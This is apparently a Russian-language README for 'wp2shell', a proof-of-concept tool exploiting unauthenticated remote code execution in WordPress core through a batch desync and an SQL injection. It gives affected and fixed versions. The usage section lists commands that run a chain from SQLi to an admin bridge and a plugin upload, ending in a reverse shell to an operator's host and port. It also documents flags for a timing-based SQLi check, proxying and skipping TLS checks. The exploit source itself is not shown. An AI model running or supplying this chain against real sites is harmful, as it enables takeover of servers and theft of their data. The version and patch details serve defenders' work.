
PoC-эксплойт для неаутентифицированного RCE в ядре WordPress, известный как WP2Shell
| Name | wp2shell |
| CVEs | CVE-2026-63030 (десинхронизация batch), CVE-2026-60137 (author__not_in SQLi) |
| Затронутые версии | WordPress 6.9.0–6.9.4, 7.0.0–7.0.1 |
| Исправлено в | 6.9.5, 7.0.2 |
| Требуется аутентификация | Не требуется |
| Обнаружил | Adam Kues (Searchlight Cyber / Assetnote) |
Голый хост = автоопределение схемы (сначала пробуется https://, затем http://). Добавляйте http:// или https:// только когда нужно принудительно задать одну из них.
# auto-detect scheme
wp2shell target.example
wp2shell 127.0.0.1:8080
# force a scheme
wp2shell https://target.example/
wp2shell http://127.0.0.1:8080/
# timing confirm
wp2shell target.example --confirm-sqli
# SQLi -> oEmbed/admin bridge -> plugin -> reverse shell
wp2shell target.example --shell
wp2shell target.example --shell 192.168.1.10 4443
| Флаг | Что делает |
|---|---|
--shell [LHOST [LPORT]] | штатная цепочка RCE; по умолчанию LHOST — IP этого компьютера, LPORT — 443 |
--rest-route | сначала пробовать /?rest_route=/batch/v1 |
--verify-tls | проверять TLS-сертификаты (по умолчанию отключено для лабораторных/самоподписанных) |
--proxy URL | пропускать трафик через прокси |
--force | пропустить определение WordPress по отпечаткам |